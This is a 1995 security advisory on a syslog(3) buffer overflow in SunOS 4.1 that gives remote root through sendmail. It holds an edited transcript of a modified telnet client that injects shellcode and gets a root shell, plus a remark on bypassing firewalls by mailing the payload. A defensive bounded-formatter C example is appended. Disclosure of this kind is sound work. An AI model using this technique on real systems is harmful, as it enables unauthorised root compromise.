COMMAND
syslog(3)
SYSTEMS AFFECTED
SunOS 4.1.*, possible others.
PROBLEM
syslog(3) uses an internal buffer to build messages. However,
it performs no bounds checking, and relies on the caller to check
the arguments passed to it. Local and remote users can obtain root
access. Here is an edited sample of using a modified telnet
client to obtain a root shell through SunOS sendmail(8) on a
SPARC-based machine.
legless[8lgm]% syslog_telnet localhost smtp
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
220 legless.8lgm.org Sendmail 4.1/SMI-4.1 ready at Sun,\
27 Aug 95 15:56:27 BST
mail from: root
250 root... Sender ok
rcpt to: root
250 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
^]
syslog_telnet>
### At this point, we provide some information to the modified
### telnet client about the remote host. Then SPARC instructions
### are sent over the link within the body of the message to
### execute a shell.
###
### As soon as the data is finished (with .), sendmail will eventually
### report, through syslog(3), data about this message. syslog's
### internal buffer will be overwritten, and our supplied
### instructions are executed.
Hit <cr>, then .<cr>
.
/usr/bin/id;
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/sh: ^M: not found
uptime;
3:57pm up 1:25, 5 users, load average: 0.11, 0.05, 0.00
/bin/sh: ^M: not found
exit;
Connection closed by foreign host.
### Here we can see that sendmail has execed a shell as root,
### and that we can type commands (lines ending in ; are
### user input through the telnet client).
###
### This exploit could be further expanded upon to encapsulate
### instructions within the body of a message, which can then
### be mailed out to a site (i.e. without the necessity to connect
### directly to the smtp port). This may be used to bypass
### firewalls.
SOLUTION
Contact vendors for fixes.
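To show the fix a defender wants in place of the unbounded formatter the advisory describes, here is an added example (it is not SunOS libc code and not part of the advisory): a bounded message formatter that reports truncation instead of overrunning its buffer. LOGBUF_SIZE, format_log_bounded and log_sender are hypothetical names chosen for this illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not SunOS libc code. The advisory's syslog(3)
 * formatted into an internal buffer with no bound, in effect:
 *     char buf[1024]; vsprintf(buf, fmt, ap);   -- no length check
 * so a caller passing long untrusted data (here: an SMTP sender
 * address) overwrote memory past the end of the buffer. */

#define LOGBUF_SIZE 64   /* small on purpose so the test hits the limit */

/* Bounded replacement: format into a caller-supplied buffer of `size`
 * bytes. Returns 0 if the message fit, 1 if it was truncated, -1 on
 * error. The buffer is always NUL-terminated on return. */
int format_log_bounded(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    int needed;

    if (buf == NULL || size == 0)
        return -1;

    va_start(ap, fmt);
    /* vsnprintf writes at most `size` bytes including the NUL and reports
     * how many bytes the complete message would have required. */
    needed = vsnprintf(buf, size, fmt, ap);
    va_end(ap);

    if (needed < 0) {
        buf[0] = '\0';
        return -1;
    }
    if ((size_t)needed >= size) {
        /* flag the cut so whoever reads the log knows data is missing */
        if (size >= 4)
            memcpy(buf + size - 4, "...", 4);
        return 1;
    }
    return 0;
}

/* Mirrors the sendmail(8) path in the advisory: the sender address is
 * attacker-controlled input that reaches the log formatter. */
int log_sender(char *buf, size_t size, const char *sender)
{
    return format_log_bounded(buf, size, "from=%s", sender);
}
```

The return value lets the caller log an explicit "message truncated" event, which is the detection signal for overlong input that the original silent overflow never produced.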